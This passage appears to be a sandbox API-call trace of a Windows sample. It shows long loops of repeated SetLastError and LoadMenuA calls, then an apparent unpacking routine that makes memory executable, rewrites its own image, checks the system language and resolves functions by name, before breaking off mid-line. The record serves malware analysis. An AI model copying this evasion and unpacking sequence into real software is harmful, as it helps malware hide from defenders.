(dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.320] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.321] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0135.322] SetLastError (dwErrCode=0x0) [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.814] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.815] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.816] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.817] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.818] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.819] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.820] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.821] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.822] LoadMenuA (hInstance=0x0, lpMenuName=0x0) returned 0x0 [0139.823] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77130000 [0139.824] GetProcAddress (hModule=0x77130000, lpProcName="VirtualProtect") returned 0x77150420 [0139.824] VirtualProtect (in: lpAddress=0x608b70, dwSize=0x11e48, flNewProtect=0x40, lpflOldProtect=0x19f0b8 | out: lpflOldProtect=0x19f0b8*=0x4) returned 1 [0139.833] LoadLibraryW (lpLibFileName="msimg32.dll") returned 0x70fb0000 [0140.009] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77130000 [0140.009] GetProcAddress (hModule=0x77130000, lpProcName="GlobalAlloc") returned 0x77150550 [0140.009] GetProcAddress (hModule=0x77130000, lpProcName="GetLastError") returned 0x7714df70 [0140.009] GetProcAddress (hModule=0x77130000, lpProcName="Sleep") returned 0x77150e60 [0140.009] GetProcAddress (hModule=0x77130000, lpProcName="VirtualAlloc") returned 0x7714f320 [0140.009] GetProcAddress (hModule=0x77130000, lpProcName="CreateToolhelp32Snapshot") returned 0x77154080 [0140.009] GetProcAddress (hModule=0x77130000, lpProcName="Module32First") returned 0x7718a660 [0140.010] GetProcAddress (hModule=0x77130000, lpProcName="CloseHandle") returned 0x77152e40 [0140.010] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x108 [0140.021] Module32First (hSnapshot=0x108, lpme=0x19eec0) returned 1 [0140.022] VirtualAlloc (lpAddress=0x0, dwSize=0xa467, flAllocationType=0x1000, flProtect=0x40) returned 0x4b0000 [0140.039] GetProcAddress (hModule=0x77130000, lpProcName="LoadLibraryA") returned 0x77150b30 [0140.039] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77130000 [0140.039] GetProcAddress (hModule=0x77130000, lpProcName="VirtualAlloc") returned 0x7714f320 [0140.039] GetProcAddress (hModule=0x77130000, lpProcName="VirtualProtect") returned 0x77150420 [0140.039] GetProcAddress (hModule=0x77130000, lpProcName="VirtualFree") returned 0x7714f420 [0140.039] GetProcAddress (hModule=0x77130000, lpProcName="GetVersionExA") returned 0x771516c0 [0140.039] GetProcAddress (hModule=0x77130000, lpProcName="TerminateProcess") returned 0x77149870 [0140.040] GetProcAddress (hModule=0x77130000, lpProcName="ExitProcess") returned 0x77154060 [0140.040] GetProcAddress (hModule=0x77130000, lpProcName="SetErrorMode") returned 0x77150570 [0140.040] SetErrorMode (uMode=0x400) returned 0x0 [0140.040] SetErrorMode (uMode=0x0) returned 0x400 [0140.040] GetVersionExA (in: lpVersionInformation=0x19ddf0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x5fad88, szCSDVersion="\n") | out: lpVersionInformation=0x19ddf0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0140.040] VirtualAlloc (lpAddress=0x0, dwSize=0x9600, flAllocationType=0x1000, flProtect=0x4) returned 0x4c0000 [0140.042] VirtualProtect (in: lpAddress=0x400000, dwSize=0xf000, flNewProtect=0x40, lpflOldProtect=0x19ee78 | out: lpflOldProtect=0x19ee78*=0x2) returned 1 [0141.687] VirtualFree (lpAddress=0x4c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.688] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77840000 [0141.689] GetProcAddress (hModule=0x77840000, lpProcName="_snwprintf") returned 0x778b5820 [0141.689] GetProcAddress (hModule=0x77840000, lpProcName="memset") returned 0x778b7640 [0141.689] GetProcAddress (hModule=0x77840000, lpProcName="NtQuerySystemInformation") returned 0x778b1410 [0141.689] GetProcAddress (hModule=0x77840000, lpProcName="_aulldiv") returned 0x778b4dc0 [0141.689] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x77130000 [0141.689] GetProcAddress (hModule=0x77130000, lpProcName="GetModuleHandleA") returned 0x771509c0 [0141.689] GetProcAddress (hModule=0x77130000, lpProcName="GetLocaleInfoA") returned 0x77148370 [0141.689] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemDefaultUILanguage") returned 0x77151880 [0141.689] GetProcAddress (hModule=0x77130000, lpProcName="HeapAlloc") returned 0x778852c0 [0141.689] GetProcAddress (hModule=0x77130000, lpProcName="HeapFree") returned 0x7714dec0 [0141.690] GetProcAddress (hModule=0x77130000, lpProcName="WaitForSingleObject") returned 0x77153030 [0141.690] GetProcAddress (hModule=0x77130000, lpProcName="Sleep") returned 0x77150e60 [0141.690] GetProcAddress (hModule=0x77130000, lpProcName="ExitThread") returned 0x7789ad80 [0141.690] GetProcAddress (hModule=0x77130000, lpProcName="lstrlenW") returned 0x7714e010 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="GetLastError") returned 0x7714df70 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="VerLanguageNameA") returned 0x77164f80 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="GetExitCodeThread") returned 0x77152040 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="CloseHandle") returned 0x77152e40 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="HeapCreate") returned 0x771509a0 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="HeapDestroy") returned 0x77150b50 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="GetCommandLineW") returned 0x77151cd0 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="ExitProcess") returned 0x77154060 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="SetLastError") returned 0x7714df00 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="TerminateThread") returned 0x77164ec0 [0141.691] GetProcAddress (hModule=0x77130000, lpProcName="SleepEx") returned 0x77153000 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="GetModuleFileNameW") returned 0x77150860 [0141.692] GetProcAddress (hModule=0x77130000, lpProcName="CreateThread") 